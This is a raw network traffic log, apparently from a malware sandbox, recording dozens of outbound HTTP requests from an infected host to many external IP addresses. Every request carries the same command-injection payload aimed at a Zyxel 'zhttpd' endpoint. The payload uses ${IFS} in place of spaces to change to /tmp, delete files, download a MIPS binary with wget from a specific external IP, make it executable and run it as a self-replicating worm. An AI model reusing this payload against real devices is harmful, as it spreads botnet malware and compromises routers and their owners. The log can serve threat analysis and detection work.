                                        Jan 14, 2024 16:18:36.253282070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2038192.168.2.135412051.57.83.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253305912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2039192.168.2.1346368184.140.164.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253324032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2040192.168.2.1351436147.131.29.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253375053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2041192.168.2.133524478.131.183.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253396034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2042192.168.2.135597859.33.117.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253421068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2043192.168.2.134993853.77.207.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253482103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2044192.168.2.1333616138.176.171.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253526926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2045192.168.2.1351716126.176.252.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253567934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2046192.168.2.1354054204.172.49.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253612041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2047192.168.2.135841652.47.64.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253637075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2048192.168.2.1341984207.151.20.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253664970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2049192.168.2.134927492.115.123.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253712893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2050192.168.2.1349122194.0.189.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253772020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2051192.168.2.133462477.17.204.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253782034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2052192.168.2.135447246.159.55.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253835917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2053192.168.2.133555070.159.108.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253843069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2054192.168.2.1340996202.238.121.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253897905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2055192.168.2.1351224129.142.76.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253931999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2056192.168.2.1335344143.45.149.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.253938913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2057192.168.2.1354044103.200.84.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254004955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2058192.168.2.1338716147.124.128.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254066944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2059192.168.2.1358560144.225.250.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254077911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2060192.168.2.133537031.34.215.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254106998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2061192.168.2.1338970128.93.26.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254132986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2062192.168.2.1350288102.54.155.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254158974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2063192.168.2.1335090128.242.153.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254184961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2064192.168.2.1344088170.92.178.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254220963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2065192.168.2.1341046192.247.165.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254287004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2066192.168.2.1339826174.191.128.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254322052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2067192.168.2.1344606199.156.171.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254338980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2068192.168.2.1336104118.73.56.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254379988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2069192.168.2.1346664155.210.30.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254401922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2070192.168.2.135553623.201.53.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254430056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2071192.168.2.1347036201.170.222.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254479885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2072192.168.2.134212836.68.96.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254517078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2073192.168.2.1352040178.22.234.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254561901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2074192.168.2.13513708.131.20.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254592896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2075192.168.2.1332820213.213.123.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254631042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2076192.168.2.1338480199.42.64.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254686117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2077192.168.2.13475929.146.1.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254713058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2078192.168.2.134682284.54.190.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254750967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2079192.168.2.134832061.161.0.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254796982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2080192.168.2.1351470151.45.153.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254822016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2081192.168.2.133678692.20.16.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254883051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2082192.168.2.134139470.218.39.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254904985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2083192.168.2.1352060198.73.241.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254977942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2084192.168.2.1359678144.182.253.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.254996061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2085192.168.2.135421241.38.113.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255042076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2086192.168.2.134454487.105.214.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255064964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2087192.168.2.136078691.95.89.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255101919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2088192.168.2.1345000132.96.138.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255171061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2089192.168.2.1335102160.154.196.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255182028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2090192.168.2.134913619.102.20.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255219936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2091192.168.2.134386079.48.151.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255278111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2092192.168.2.1353146143.254.136.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255340099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2093192.168.2.1346344178.90.240.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255351067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2094192.168.2.133291297.120.137.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255372047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2095192.168.2.1345780108.181.54.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255435944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2096192.168.2.134395447.86.108.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255492926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2097192.168.2.1340558204.213.242.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255548954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2098192.168.2.1350082197.1.198.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255584955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2099192.168.2.1333166150.69.165.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255637884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2100192.168.2.135397446.31.17.210443
                                        TimestampBytes transferredDirectionData
